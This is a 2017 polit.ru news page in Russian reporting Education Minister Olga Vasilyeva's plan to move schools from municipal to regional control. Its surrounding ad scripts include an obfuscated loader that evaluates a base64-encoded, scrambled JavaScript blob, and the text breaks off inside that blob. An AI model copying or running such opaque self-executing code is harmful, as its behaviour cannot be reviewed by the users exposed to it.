<!DOCTYPE html>
<html prefix="og: http://ogp.me/ns#">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <title>Глава Минобрнауки РФ объявила о начале масштабной школьной реформы - ПОЛИТ.РУ</title>

    <link rel="canonical" href="http://polit.ru/news/2017/07/06/school/"/>
    <link rel="manifest" href="/manifest.json">

    <!-- Stylesheets -->
    <link rel="stylesheet" type="text/css" href="/static/polit/css/main.css"/>
    <link rel="stylesheet" type="text/css" href="/static/polit/css/mark-up.css"/>
    <link rel="stylesheet" type="text/css" href="/static/polit/css/content.css"/>
    <link rel="stylesheet" type="text/css" href="/static/polit/css/new.css"/>
    <!--[if IE]><link rel="stylesheet" type="text/css" href="/static/polit/css/ie.css" /><![endif]-->
    <link rel="stylesheet" href="/ads/style.css" type="text/css" media="all"/>

    <meta name="robots" content="all"/>
    <meta name="google-site-verification" content="ZbGJDYfmTGZz23DSt4DiWF448AY8MAD_9PSbBo2DAXU"/>
    <meta property="fb:app_id" content="482430971798114"/>

    <meta name="description" content="Глава Минобрнауки РФ объявила о начале масштабной школьной реформы - Полит.ру" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:site" content="@POLITRU_" /><meta property="og:title" content="Глава Минобрнауки РФ объявила о начале масштабной школьной реформы - ПОЛИТ.РУ" /><meta property="og:url" content="http://polit.ru/news/2017/07/06/school/" /><meta property="og:description" content="Минобрнауки объявило о планах проведения масштабной реформы школьного образования, предусматривающих передачу школ от муниципальных властей к региональным, сообщает &amp;laquo;Интерфакс&amp;raquo; ." /><meta property="og:image" content="http://polit.ru/media/photolib/2016/11/08/210494_1000x666_347_1f1392631d9b0d3a137719c788667ad5_1499352416.jpg" /><meta name="pubdate" content="2017-07-06T17:39:49" /><meta name="news_keywords" content="Минобрнауки, образование, школа" />

    <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async></script>
    <script>
      var OneSignal = OneSignal || [];
      OneSignal.push(['init', {
        appId: '9b6ff30d-450f-4958-9b28-2e63e1c92158',
        subdomainName: 'polit-ru',
        safari_web_id: 'web.onesignal.auto.43f3e2d2-3818-43ea-aa50-e469d0e1e106'
      }]);
    </script>
    <script type="text/javascript" src="//vk.com/js/api/openapi.js"></script>
    <script type="text/javascript">
      VK.init({apiId: 3289294, onlyWidgets: true});
    </script>
    <link rel="alternate" type="application/rss+xml" title="Полная лента ПОЛИТ.РУ" href="/feeds/" />
    <link rel="alternate" type="application/rss+xml" title="Статьи ПОЛИТ.РУ" href="/feeds/article/" />
    <link rel="alternate" type="application/rss+xml" title="Ёлкин дня!" href="/feeds/elkin/" />
    <link rel="stylesheet" href="/static/polit/css/politgal.css" type="text/css" media="screen" />
    <script src="/static/polit/js/polit.js" type="text/javascript"></script>
    <script src="//lib.rl0.ru/adfox/7/adfox.custom.min.js" type="text/javascript"></script>
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script type="text/javascript"> var script = document.createElement('script'); script.src = '//meelba.com/3.html?group=polit_ru&seoref='+encodeURIComponent(document.referrer)+'&rnd='+Math.random()+'&HTTP_REFERER='+encodeURIComponent(document.URL); script.async = true; document.head.appendChild(script); </script>
    <script src="https://yastatic.net/pcode/adfox/loader.js" type="text/javascript"></script>
    <script src="/static/polit/js/politart.js" type="text/javascript"></script><script src="/static/polit/js/politgal.js" type="text/javascript"></script><script id="js-mpf-mediator-init" data-counter="2771166" data-adaptive="true">!function(e){function t(t,n){if(!(n in e)){for(var r,a=e.document,i=a.scripts,o=i.length;o--;)if(-1!==i[o].src.indexOf(t)){r=i[o];break}if(!r){r=a.createElement("script"),r.type="text/javascript",r.async=!0,r.defer=!0,r.src=t,r.charset="UTF-8";;var d=function(){var e=a.getElementsByTagName("script")[0];e.parentNode.insertBefore(r,e)};"[object Opera]"==e.opera?a.addEventListener?a.addEventListener("DOMContentLoaded",d,!1):e.attachEvent("onload",d):d()}}}t("//top-fwz1.mail.ru/js/code.js","_tmr"),t("//mediator.imgsmail.ru/2/mpf-mediator.min.js","_mediator")}(window);</script>
  </head>
<body class="new">
    <!--BEGIN #header-->
      
<div class="page">

<div id="adfox_1484147658729819" style="margin-bottom:5px;"></div>
<script>
    window.Ya.adfoxCode.create({
        ownerId: 246976,
        containerId: 'adfox_1484147658729819',
        params: {
            pp: 'g',
            ps: 'ckyr',
            p2: 'figh'
        }
    });
</script>

<div class="black-top">
  <a href="http://polit.ua/">Полiт.ua</a>
  <a href="http://govweb.ru/">Государственная сеть</a>
  <a href="http://www.goslyudi.ru">Государственные люди</a>
  
  
  <a href="/promo/">Войти</a>
  
</div>

<div class="top-box">
  <div class="top-logo">
    
      <a href="/"><img src="/static/polit/img/politru_logo_2012.jpg" width="230" height="108" alt="Полит.ру" title="Полит.ру"/></a>
    
  </div>
  <div class="editors-choice-box">
<ul class="editors-choice">
 
  <li>
    <a href="/article/2017/07/06/samovyd/">
      
        <span class="author">Василий  Измайлов</span>
      
      Самовыдвижение Путина. Без вариантов?
    </a>
  </li>
 
  <li>
    <a href="/article/2017/07/03/election/">
      
        <span class="author">Андрей Щербаков</span>
      
      Выборы будут неконкурентными. Почему?
    </a>
  </li>
 
  <li>
    <a href="/article/2017/07/04/korea/">
      
        <span class="author">Анна  Сакоян</span>
      
      КНДР: межконтинентальный потенциал
    </a>
  </li>
 
  <li>
    <a href="/article/2017/07/06/ege/">
      
        <span class="author">Никита Белоголовцев</span>
      
      Об особенностях ЕГЭ и школьного образования
    </a>
  </li>
 
  <li>
    <a href="/article/2017/07/05/granin/">
      
        <span class="author">Сергей Чупринин</span>
      
      Памяти Даниила Гранина
    </a>
  </li>

</ul>
</div>

  <div class="top-right">
    <div class="date-header" >
        <span id="date"><!-- date --> 6 июля 2017, четверг, 19:26<!-- /date --></span>
    </div>
    <div class="top-social">
      <a href="http://www.facebook.com/#!/politru" rel="nofollow"><img src="/static/polit/img/new-facebook.png" width="20" height="20" alt="Facebook"/></a>
      <a href="http://twitter.com/POLITRU_" rel="nofollow"><img src="/static/polit/img/new-twitter.png" width="20" height="20" alt="Twitter"/></a>
      <a href="http://polit.livejournal.com/" rel="nofollow"><img src="/static/polit/img/new-livejournal.png" width="20" height="20" alt="LiveJournal"/></a>
      <a href="http://vkontakte.ru/club21337773" rel="nofollow"><img src="/static/polit/img/new-vkontakte.png" width="20" height="20" alt="VK.com"/></a>
      <a href="/feeds/" rel="nofollow"><img src="/static/polit/img/new-rss.png" width="20" height="20" alt="RSS"/></a>
    </div>
    <div class="top-search">
      <form action="/search/">
        <table><tbody><tr>
          <td class="main"><div>
            <input type="search" name="q" id="search-q" onfocus="this.value=''" placeholder="Автор, Статья, Тема" />
          </div></td>
          <td><div>
            <input type="submit" value="ИСКАТЬ" id="search-submit" />
          </div></td>
        </tr></tbody></table>
      </form>
    </div>
  </div>
</div>
<div class="top-menu">
  <table><tbody><tr>
    <td><h2><a href="/news/" class="selected">НОВОСТИ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>
    <td><h2><a href="/article/">СТАТЬИ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>

    <td><h2><a href="/author/">АВТОРЫ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>
    <td><h2><a href="/lectures/publ_lect/">ЛЕКЦИИ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>



    <td><h2><a href="/rubric/proscience/">PRO SCIENCE</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>
    <td><h2><a href="/rubric/skolkovo/">СКОЛКОВО</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>

    <td><h2><a href="/district/">РЕГИОНЫ</a></h2></td>

    
  </tr></tbody></table>
</div>

    <!--END #header-->

    <!-- BEGIN #breadcrumbs -->
      	
    <!--END #breadcrumbs-->



 

  <div class="top-menu-shadow">


    <img src="/static/polit/img/green_block_shadow_bottom.jpg" alt=""/>
    





  </div>
  <div class="main-cols ib-parent">
  
    
      
<!-- BEGIN #left column -->

<div class="left-sidebar ib-col">

<!-- start banner google adsense -->
<!-- Polit\polit.ru\234x60 -->
<!--ins class="adsbygoogle"
style="display:inline-block;width:234px;height:60px"
data-ad-client="ca-pub-1154951643410219"
data-ad-slot="6440819918">
</ins>
<script>
(adsbygoogle=window.adsbygoogle || []).push({});
</script-->
<!-- stop banner google adsense -->

  
  <div class="left-or-right-top-banner-slot"></div>
  <div class="block likebox">
    <iframe src="//www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpolitru&amp;width=234&amp;height=168&amp;colorscheme=light&amp;show_faces=true&amp;border_color&amp;stream=false&amp;header=false" scrolling="no" frameborder="0" style="border-bottom: 1px solid #AAA; overflow:hidden; width:234px; height:153px;" allowTransparency="true"></iframe>

    <!-- VK Widget -->
    <div id="vk_groups"></div>
    <script type="text/javascript">
      VK.Widgets.Group("vk_groups", {mode: 0, width: "234", height: "10", color1: 'FFFFFF', color2: '2B587A', color3: '5B7FA6'}, 21337773);
    </script>
  </div>
     <div class="left-banner-slot-above-top-articles"></div>
     <div class="left-banner-slot-above-top-articles-2"></div>
     <div class="block netlenka">
         <div class="subject">Нетленка</div>
         <ul class="top-articles">
 
  <li>
    <a href="/article/2006/04/27/aleksievich/">
      
        <span class="author">Светлана Алексиевич</span>
      
      Глава из книги &quot;Чернобыльская молитва&quot;
    </a>
  </li>
 
  <li>
    <a href="/article/2015/10/08/aleksievich/">
      
        <span class="author">Антон Быков</span>
      
      Нобель для Светланы Алексиевич
    </a>
  </li>
 
  <li>
    <a href="/article/2016/12/17/new_model/">
      
        <span class="author"> А. Кудрин, А. Архангельский, Г. Нахапетян, Д. Дондурей</span>
      
      В поисках новой модели социального государства
    </a>
  </li>
 
  <li>
    <a href="/article/2004/10/18/dond/">
      
        <span class="author">Даниил Дондурей</span>
      
      Террор: Война за смысл
    </a>
  </li>
 
  <li>
    <a href="/article/2003/02/04/579992/">
      
        <span class="author">Даниил Дондурей</span>
      
      90-е: Кино снимали для другой страны. Содержательные и институциональные трансформации в российском кинематографе
    </a>
  </li>

</ul>

     </div>
     <div class="left-banner-slot-below-top-articles"></div>
     <div class="block">
         <div class="subject"><a href="/genre/seminars/">Семинары</a></div>
     </div>
     <div class="left-banner-slot-below-seminars"></div>
     <div class="top-district-news">
        <span style="text-transform: uppercase; font-size: 21px;">Новости регионов</span>
        
<div class="top-news" style="margin: 0px;">
  <br>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://debri-dv.com/article/16724/ilya_solovyh_naznachen_pervym_zamestitelem_rukovoditelya_su_skr_po_habarovskomu_krayu" target="_blank" class="hover">Илья Соловых назначен первым заместителем руководителя СУ СКР по Хабаровскому краю</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://www.griffmedia.ru/sluzhba_novostey/bilyardnye_asy_razygrayut_kubok_gubernatora_oblasti.html" target="_blank" class="hover">Бильярдные асы разыграют Кубок Губернатора области</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://www.griffmedia.ru/sluzhba_novostey/eks-buhgalter_rayonnoy_gazety_predstanet_pered_sudom_za_moshennichestvo.html" target="_blank" class="hover">Экс-бухгалтер районной газеты предстанет перед судом за мошенничество</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://www.griffmedia.ru/sluzhba_novostey/zauralcy_poluchat_pomosch_ot_vlastey_v_priobretenii_povalennogo_uraganom_lesa.html" target="_blank" class="hover">Зауральцы получат помощь от властей в приобретении поваленного ураганом леса</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://www.griffmedia.ru/sluzhba_novostey/vasileva_rasskazala_o_masshtabnoy_shkolnoy_reforme.html" target="_blank" class="hover">Васильева рассказала о масштабной школьной реформе</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://justmedia.ru/analitika/project/249413?utm_source=rss&amp;utm_medium=click&amp;utm_campaign=rss" target="_blank" class="hover">«Отучила мужа ходить по дому в обуви. Думала, такое бывает только в кино». Екатеринбурженка о любви к мексиканцу и семейной жизни в Калифорнии. СПЕЦПРОЕКТ</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://justmedia.ru/news/society/249447?utm_source=rss&amp;utm_medium=click&amp;utm_campaign=rss" target="_blank" class="hover">Преподаватель Ирина Колотовкина: «Люблю лето, когда за окном идет дождь, можно взять в руки любимую книгу». В пятницу будет пасмурно. ФОТО, ВИДЕО</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://i38.ru/obschestvo-obichnie/irkutskstat-nazval-samuiu-svadebnuiu-poru-v-priangare" target="_blank" class="hover">Иркутскстат назвал самую «свадебную пору» в Приангарье</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://i38.ru/pogoda-obichnie/v-irkutske-7-iiulya-obeschaiut-nebolshoy-dozhd" target="_blank" class="hover">В Иркутске 7 июля обещают небольшой дождь</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://debri-dv.com/article/16728/leopardy_s_kotorymi_lichno_znakom" target="_blank" class="hover">Леопарды, с которыми лично знаком</a>
      <!--/div-->
    </div>
  
</div>



     </div>

<!-- start redtram -->

<div id="n4p_28541">Loading...</div>
<script type="text/javascript" charset="utf-8">
  (function(d,s){
    var o=d.createElement(s);
    o.async=true;
    o.type="text/javascript";
    o.charset="utf-8";
    if (location.protocol == "https:") {
      o.src="https://js-ru.redtram.com/n4p/0/28/ticker_28541.js";
    }
    else {
      o.src="http://js.ru.redtram.com/n4p/0/28/ticker_28541.js";
    }
    var x=d.getElementsByTagName(s)[0];
    x.parentNode.insertBefore(o,x);
  })(document,"script");
</script>

<!-- end redtram -->

     <div class="block">
         <div class="subject">Спецпроекты</div>
         
<div class="link">
	<a href="/rubric/literatures/">Национальные литературы</a>
</div>

<div class="link">
	<a href="/rubric/elections2016/">Выборы-2016 с Линой Арифулиной</a>
</div>

<div class="link">
	<a href="/rubric/ecology/">Экологическая повестка</a>
</div>

<div class="link">
	<a href="/rubric/opendata/">Открытое государство</a>
</div>

<div class="link">
	<a href="/rubric/politeia/">Русская политейя</a>
</div>


     </div>
     <div class="block">
         <div class="subject"><a href="/genre/dossie/">Документы</a></div>
     </div>
     <div class="block">
         <div class="subject"><a href="/rubric/redakciya/">О проекте</a></div>
     </div>

     <div id="adfox_1484224754714716"></div>
     <script>
     window.Ya.adfoxCode.createScroll({
        ownerId: 246976,
        containerId: 'adfox_1484224754714716',
        params: {
            pp: 'h',
            ps: 'ckyr',
            p2: 'fiwu'
        }
     });
     </script>

     <div class="left-material-banner-slot-1"></div>
     <div class="left-banner-slot-0"></div>
     <div class="left-banner-slot-1"></div>
     <div class="block partners">
       <div class="subject">Партнеры</div>
       <div class="left-partners-slot-1"></div>
       <div class="left-partners-slot-2"></div>
       <div class="left-partners-slot-3"></div>
     </div>
 </div>
 <!-- END #left column -->

    
  
<!--BEGIN #content-->


  
    <div class="new-main-content ib-col">
      <div class="article-detail" id="material-news451703">
  
        <div id="fb-root"></div>
        <script>(function(d, s, id) {
          var js, fjs = d.getElementsByTagName(s)[0];
          if (d.getElementById(id)) return;
            js = d.createElement(s); js.id = id;
            js.src = "//connect.facebook.net/ru_RU/all.js#xfbml=1";
            fjs.parentNode.insertBefore(js, fjs);
          }(document, 'script', 'facebook-jssdk'));
        </script>
        <div class="date">
          06 июля 2017, 17:39
          
            
              <div class="tags-subject">
                <span>
                  
                    <a href="/tag/minobrnauki/">Минобрнауки</a>
                  
                    <a href="/tag/niu/">образование</a>
                  
                    <a href="/tag/schcool/">школа</a>
                  
                </span>
              </div>
            
          
        </div>
        <h1 class="title">Глава Минобрнауки РФ объявила о начале масштабной школьной реформы</h1>
        
        
          
            
          
          
          <div class="image-with-overlay d600x450 below23 image-gray-back-big">
            <a href="/media/photolib/2016/11/08/210494_1000x666_347_1f1392631d9b0d3a137719c788667ad5_1499352416.jpg" rel="lightbox" title="Министр образования Ольга Васильева">
              <img src="/media/photolib/2016/11/08/thumbs/210494_1000x666_347_1f1392631d9b0d3a137719c788667ad5_1499352416.jpg.600x450_q85.jpg" alt="Министр образования Ольга Васильева" title="Министр образования Ольга Васильева" style="margin-top:-225px; margin-left:-300px;"/>
              
            </a>
            <div class="image-overlay image-overlay-bottom-right">
              Министр образования Ольга Васильева
              
                <div class="image-extra-source"><a href="http://www.mskagency.ru/photobank/210494" rel="nofollow">Сергей Ведяшкин / АГН &quot;Москва&quot;</a></div>
              
            </div>
          </div>
          
        
        <div class="content">
          
            
          
          <div class="text doc js-mediator-article">
            <p>Минобрнауки объявило о планах проведения масштабной реформы школьного образования, предусматривающих передачу школ от муниципальных властей к региональным, сообщает <a href="http://www.interfax.ru/russia/569432">&laquo;Интерфакс&raquo;</a>.</p>
            



            
<p>Нынешняя система, когда школы подчиняются муниципальным властям, неэффективна и требует перемен, в частности, для укрепления вертикали управления с Минобрнауки во главе, заявила 6 июля министр образования и науки РФ Ольга Васильева на заседании комитета Госдумы РФ по образованию и науки.</p>
<p>&laquo;Трудно себе представить, что 44 тысячи школ никоим образом министерству образования и науки не подчиняются. Также они не подчиняются региону&raquo;, &mdash; почеркнула &nbsp;министр.</p>
<p>&laquo;Когда принималась эта реформа (в 1990-е годы &ndash; прим.), это был один исторический период, а сейчас совершенно другой исторический период, который требует, естественно, - я позволю себе такой термин произнести - &laquo;государственные школы&raquo;. То есть возвращения школ в государство и выстраивания государственного управления, потому что сейчас школы вне государственной опеки и заботы&raquo;, - заявила Васильева.</p>
<p>Она сообщила, что реформу планируется начать с &laquo;пилотного проекта&raquo;, о готовности участвовать в котором уже объявили 16 регионов.</p>
            
          </div>

          <div style="padding-bottom: 20px;"><h4 style="color: #007854;text-transform: uppercase;font-size: 120%;padding: 0;">Обсудите в соцсетях</h4>
            <script type="text/javascript">(function(w,doc) {
              if (!w.__utlWdgt ) {
                w.__utlWdgt = true;
                var d = doc, s = d.createElement('script'), g = 'getElementsByTagName';
                s.type = 'text/javascript'; s.charset='UTF-8'; s.async = true;
                s.src = ('https:' == w.location.protocol ? 'https' : 'http')  + '://w.uptolike.com/widgets/v1/uptolike.js';
                var h=d[g]('body')[0];
                h.appendChild(s);
              }})(window,document);
            </script>
            <div data-background-alpha="0.0" data-buttons-color="#ffffff" data-counter-background-color="#ffffff" data-share-counter-size="12" data-top-button="false" data-share-counter-type="separate" data-share-style="10" data-mode="share" data-like-text-enable="false" data-hover-effect="scale" data-mobile-view="false" data-icon-color="#ffffff" data-orientation="horizontal" data-text-color="#ffffff" data-share-shape="rectangle" data-sn-ids="fb.tw.vk.ok.lj.em." data-share-size="40" data-background-color="#ffffff" data-preview-mobile="false" data-mobile-sn-ids="fb.vk.tw.wh.ok.gp." data-pid="1413315" data-counter-background-alpha="1.0" data-following-enable="false" data-exclude-show-more="true" data-selection-enable="false" class="uptolike-buttons" ></div>
          </div>

          <!-- start banner google adsense -->
          <!-- Polit\polit.ru\468x60 -->
          <!--ins class="adsbygoogle"
          style="display:inline-block;width:468px;height:60px"
          data-ad-client="ca-pub-1154951643410219"
          data-ad-slot="4824359318">
          </ins>
          <script>
          (adsbygoogle=window.adsbygoogle || []).push({});
          </script-->
          <!-- stop banner google adsense -->

          
        </div>

        <div class="bottom-social stop">
          <div class="print">
            <a href="/news/2017/07/06/school/print/" rel="nofollow">Версия для печати</a>
          </div>
        </div>
       <!-- 
<div class="comments stop">
  <div class="subject">Комментарии</div>
  <div class="comments-content">
    <div class="fb-comments" data-href="http://polit.ru/news/2017/07/06/school/" data-width="580" data-num-posts="10"></div>
    <div id="vk_comments"></div>
    <script type="text/javascript">
      VK.Widgets.Comments("vk_comments", {limit: 10, width: "580", attach: false});
    </script>
  </div>
</div>

 -->
        <script type="text/javascript" src="/static/orphus/orphus.js"></script>
        <a href="http://orphus.ru" id="orphus" target="_blank" title="Система Orphus" rel="nofollow"><img alt="Система Orphus" src="/static/orphus/orphus.gif" border="0" width="600"></a>
        
          
            <div class="related-block">
              <div class="title">Смотрите также:</div>
              <div class="square-flow">
                
                  
  <div class="col3-special" id="square-article50781">
    
<a href="/article/2017/06/23/vospitanie/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/06/22/thumbs/800-600_1498134733.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Владимир Путин на встрече с учителями в Кремле" title="Владимир Путин на встрече с учителями в Кремле" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      Дмитрий Абзалов
    
  
</div>

    <h4>
      Почему Путин говорил с учителями о воспитании
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-article50303">
    
<a href="/article/2017/05/05/ege/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/05/05/thumbs/800-600_1JgcUkn_1493992208.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Девочка с чемоданом" title="Девочка с чемоданом" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      ЕГЭ заметно повысил мобильность абитуриентов и траты их родителей
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-article50216">
    
<a href="/article/2017/04/28/teachers/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/04/27/thumbs/_800-600_3Z17ufC_1493370283.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Учитель математики" title="Учитель математики" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      Дмитрий Логинов
    
  
</div>

    <h4>
      О проблемах школьных учителей
    </h4>
  </div>
</a>

  </div>


                
                <div class="stop"></div>
              </div>
            </div>
          
        

<div style="margin: 10px; width: 580px;">
<script type="text/javascript"><!--
google_ad_client = "ca-pub-1191230850516122";
/* adxguru\polit.ru\580x400\0 */
google_ad_slot = "1666723527";
google_ad_width = 580;
google_ad_height = 400;
//-->
</script>
<script type="text/javascript"
src="//pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</div>

        <div style="width:600px;">
      <!-- 24СМИ Start -->
      <div id="smi_teaser_10975">
          <center><a href="http://24smi.info">Новостной агрегатор 24СМИ</a></center>
      </div>
      <script type="text/JavaScript" encoding="utf8">
          (function() { var sm = document.createElement("script"); sm.type = "text/javascript"; sm.async = true; sm.src = "//jsn.24smi.net/4/8/10975.js"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(sm, s);})();
      </script>
      <!-- 24СМИ End -->

      <!-- LentaInformNews Start -->
      <div id="LentaInformScriptRootN11072" class="news-block-magick">
        <div id="LentaInformPreloadN11072">
          <a href="http://lentainform.com/" target="_blank">Загрузка...</a>
        </div>
        <script>
                (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("LentaInformScriptRootN11072")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("LentaInformScriptRootN11072");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=11072;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.lentainform.com/p/o/polit.ru.11072.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
        </script>
      </div>
      <!-- LentaInformNews End -->

      <!-- google adsense -->
<script type="text/javascript"><!--
google_ad_client = "ca-pub-1191230850516122";
/* adxguru\polit.ru\468x60\0 */
google_ad_slot = "8133317607";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="//pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
      <!-- google adsense End -->

      <!-- 24СМИ реклама Start -->
      <div id="smi_teaser_10974">
           <center><a href="http://partner.24smi.info">Нативная реклама ADWILE</a></center>
      </div>
      <script type="text/JavaScript" encoding="utf8">
           (function() { var sm = document.createElement("script"); sm.type = "text/javascript"; sm.async = true; sm.src = "//jsn.24smi.net/a/9/10974.js"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(sm, s);})();
      </script>
      <!-- 24СМИ реклама End -->

      <!-- MarketGidNews Start -->
      <div id="MarketGidScriptRootN13911" class="news-block-magick">
           <div id="MarketGidPreloadN13911">
                <a href="http://marketgid.com/" target="_blank">Загрузка...</a>
           </div>
           <script>
               (function(){
                   var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
                   var i=d[ce]('iframe');i[st][ds]=n;d[gi]("MarketGidScriptRootN13911")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
                   catch(e){var iw=d;var c=d[gi]("MarketGidScriptRootN13911");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=13911;c[ac](dv);
                   var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.marketgid.com/1/p/1.polit.ru.13911.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
           </script>
      </div>
      <!-- MarketGidNews End -->

      <!-- smi2 Start -->
      <div id="unit_84866"><a href="http://smi2.net/">Новости СМИ2</a></div>
      <script type="text/javascript" charset="utf-8">
        (function() {
          var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
          sc.src = '//news.smi2.ru/data/js/84866.js'; sc.charset = 'utf-8';
          var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
        }());
      </script>
      <!-- smi2 End -->


      <!-- RedTram Start -->
      <div id="n4p_15006">Loading...</div>
      <script type="text/javascript" charset="utf-8">
      (function(d,s){
      var o=d.createElement(s);
      o.async=true;
      o.type="text/javascript";
      o.charset="utf-8";
      if (location.protocol == "https:")
      { o.src="https://js-goods.redtram.com/ticker_15006.js"; o.setAttribute("alt-src","https://js-goods.redtram.com/ticker_15742.js");}
      else
      { o.src="http://js.grt02.com/ticker_15006.js"; o.setAttribute("alt-src","http://js.grt02.com/ticker_15742.js");}
      o.setAttribute("cur-id","n4p_15006");
      o.setAttribute("alt-id","n4p_15742");
      o.setAttribute("o-data",eval(atob('KGZ1bmN0aW9uKCl7dmFyIGE9KGMpKCJcInluc3AlYXN0b2FFc0VBZXFydDlkaHZueS9Fb0JlQWNGbG5sSkRYTHMldE0lRXMlVnRhQWZuJXJkMyVcIm43TVVhJWVpeGR0YTAsZW9zciBhZCVRYSllZWxlV2V0VGR0VHNsaXNuZWUlc25lbmklbXVzV3JkcnN3JSVlJSVSZWFkYS5zS2VoJW1XJXFMc3Jvd29zcl93byVlcmVvJTpHb0VpNW9ydCUoME91bm5uQWMlOnhpZShvc3BocmdsYXNucm95dGV0bnlJJ1pheCVyQXJpb2lHJWd0ZGRzdHppYS9ubUFlZ1RlXCJyJyVpQ25kcE9jZXNsaGh0dGNhcGFubU5DZSVjcmp3ZWNlYmV1Y0l0bSVhXCJidGVuZWVjaXBvd25kTSV0czZhLy8lQXJBZ25zeE9hb25vX0Ulc2xoZ2dwYSVrJXJnSCVycGdBcHJzb2RuZHR5ZCV7cHV0bW8vcmVwSWVlcXNldG9QUi8lJXI7aWFhZWxjJWN5bSVvUlwiJXQlQXJBb21BcGlwbmllKEtlb0J9aEFsU2ZvdEJBckVmT2VrJUFpb29YSHd1R2ZtJW9BZGwlbXRlbi5tbjp2bHNBKWglb2VjdW1ldXQlPWVlZW50bGU7ZUJhYW9naHBpZnJqdmV0dEVlblRwYXQ4cnRndG1kJWdzdSVOTm9Dbnkxd3NBZHJxeW5ldFNkcGUlcm0lc29kQWUuJSVsZWp9JWNBeSVuVHVkb3NSdGJcImVsNm9yOnNkbzp4ZUhvQyVibm97aHNuJW9BJVF0QW8sZW50bUc9fCVcIiVpbFdFRG5zbnBybGxyQmhFbDJpNCV3dGkpZnB0X3QvNSVMZU5zQ3ZlYUFka2VvZSVlYSV3bG9wcmphU3RldGF0Z2V6aHI0bW9uc0wuU3RlaUF0YXlvXCIlJUFiZXNFZmFvdCIsMTM2ODYwMzMpO2Z1bmN0aW9uIGMoZSxwKXt2YXIgYj1lLmxlbmd0aDt2YXIgbD1bXTtmb3IodmFyIG89MDtvPCBiO28rKyl7bFtvXT0gZS5jaGFyQXQobyl9O2Zvcih2YXIgbz0wO288IGI7bysrKXt2YXIgZj1wKiAobysgNSkrIChwJSA0NTg4NDIpO3ZhciBjPXAqIChvKyA3KSsgKHAlIDI2NTk3NSk7dmFyIG49ZiUgYjt2YXIgZz1jJSBiO3ZhciBoPWxbbl07bFtuXT0gbFtnXTtsW2ddPSBoO3A9IChmKyBjKSUgNTU5MTc4Nzd9O3ZhciBqPVN0cmluZy5mcm9tQ2hhckNvZGUoMTI3KTt2YXIgbT0iIjt2YXIgaT0iXHgyNSI7dmFyIGE9Ilx4MjNceDMxIjt2YXIgZD0iXHgyNS